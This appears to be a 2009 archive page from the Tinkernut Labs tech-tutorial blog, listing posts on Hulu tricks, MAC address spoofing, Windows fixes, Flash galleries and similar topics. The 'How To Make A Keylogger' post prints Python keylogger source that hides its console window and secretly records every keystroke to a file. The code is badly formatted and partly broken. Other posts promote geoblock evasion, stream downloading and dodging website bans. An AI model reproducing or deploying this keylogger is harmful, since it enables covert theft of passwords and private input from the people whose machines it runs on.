Tinkernut Labs



  • Two Cool Hulu Tricks

    September 30, 2009 // davisde // Cool Websites, Hacks, Multimedia Tips, Web Tips Tags: anywhere, download, Hacks, hulu, ip, online, proxy, tips, tricks, tutorial, Video 6 Responses





    This video covers two programs, IP Hider (free trial) and Hulu Video Downloader (freeware). IP Hider allows you to access Hulu from anywhere in the world and Hulu Video Downloader allows you to download Hulu programming to your computer. Hulu Video Downloader is only available in the US.

    IP Hider – http://www.allanonymity.com/ip-hider-hide-ip-software
    Hulu Video Downloader – http://www.downloadtoolz.com/hulu/

  • How To Make A Keylogger

    September 11, 2009 // davisde // Hacks, Programming Tips Tags: computer, hack, hacking, keyboard, keylogger, programming, python, scripts, tinkernut, tips, tricks, tutorial 38 Responses


    KEYLOGGER SOURCECODE AND

    – Download Python: http://www.python.org/

    – Download Pyhook: pyhook.sourceforge.net

    – Download Python for Windows Extensions: http://sourceforge.net/projects/pywin32/

    SOURCE:

    import win32api
    import win32console
    import win32gui
    
    import pythoncom, pyHook
    
    win = win32console.GetConsoleWindow()
    win32gui.ShowWindow(win,0)
    
    def OnKeyboardEvent(event):
     if event.Ascii==5:
            
    _exit(1)
    
     if event.Ascii != 0 or 8:
     f=open('c:output.txt','r')
           
     buffer=f.read()
     f.close()
            
    f=open('c:output.txt','w')
     keylogs=chr(event.Ascii)
           
     if event.Ascii==13:
     keylogs='/n'
     buffer += 
    keylogs
     f.write(buffer)
     f.close()
    
    hm = pyHook.HookManager()
    hm.KeyDown = OnKeyboardEvent
    hm.HookKeyboard()
    pythoncom.PumpMessages()
  • Hacking Tip: Change Your MAC Address

    September 4, 2009 // davisde // Hacks Tags: address, block, bypass, change, game, hack, hacking, hide, ip, mac, sites, tips, tricks, tutorial, website 3 Responses





    This video will show you how to bypass websites that have blocked you by changing your MAC address, which will change your IP address. You can download now download it from this link: http://www.tinkernut.com/demos/205_mac/macmakeup195d.zip

  • How To Fix A Windows BSOD

    August 7, 2009 // davisde // Safety & Security, Video Tags: 7, boot, data, safe, screen, tinkernut, tips, tricks, tutorial, vista, windows, xp 18 Responses





    This video covers the basics of how to fix the most common Windows Blue Screen Errors, commonly referred to as the Blue Screen of Death (BSOD).

  • Howcast & Tinkernut: How To Make An Adobe Flash Photo Gallery

    July 27, 2009 // davisde // Howcast & Tinkernut, Multimedia Tips, Programming Tips Tags: actionscript, adobe, flash, Howcast & Tinkernut, photo, picture, pictures, programming, tinkernut, tips, tricks, tutorial, web 8 Responses



    How To Create an Adobe Flash Slide Show on Howcast

    Don’t just send people a stack of static photo files; share them in style by creating a photo gallery in Flash.

  • Basic Cloud Computing

    July 24, 2009 // davisde // Video, Web Tips Tags: backup, cloud, computing, files, free, internet, online, operating, os, proxy, system, tinkernut, tips, tricks, tutorial 56 Responses


    This video covers the basics of cloud computing. For questions and for all the links used in this video, please visit the URL below:

    http://www.tinkernut.com/forum/video-tutorial-help/how-to-cloud-compute

  • How To Make An Online Store

    July 3, 2009 // davisde // DIY Projects, Programming Tips, Web Tips Tags: custom, free, make, money, online, tips, tricks, tutorial, webmaster, website 3 Responses


    This video shows you three different free ways to create an online store. For help, please visit the forum link: http://www.tinkernut.com/forum/video-tutorial-help/how-to-make-an-online-store

  • Best Search Engine?

    June 26, 2009 // davisde // Video, Web Tips Tags: engine, google, Hacks, search, tips, tricks, tutorial 75 Responses


    This video reviews the two most popular search engines, Google and Yahoo as well as the two newest search engines, Bing and Wolfram Alpha. Which one is your favorite? For all the links and tips used in this video, please visit the URL below:
    http://www.tinkernut.com/forum/video-tutorial-help/best-search-engine

  • How To Slipstream Windows Installations

    June 12, 2009 // davisde // DIY Projects, Software Tips Tags: cd, format, install, tips, tricks, tutorial, virus, vista, windows, xp 8 Responses


    ***THIS TUTORIAL IS NOT FOR BEGINNERS*** Learn how to make a Windows installation that automatically enters your CD-Key, enters your information and automatically installs updates, drivers and your favorite programs.

  • Howcast & Tinkernut: How To Dust For Fingerprints

    June 11, 2009 // davisde // DIY Projects, Hacks, Multimedia Tips, Video Tags: diy, forensics, Howcast & Tinkernut, projects, science, tips, tricks, tutorial 1 Response



    How To Dust For Fingerprints on Howcast

    This is a tutorial I made for Howcast.com. It shows how to dust for fingerprints using household items.

← Older posts
Newer posts →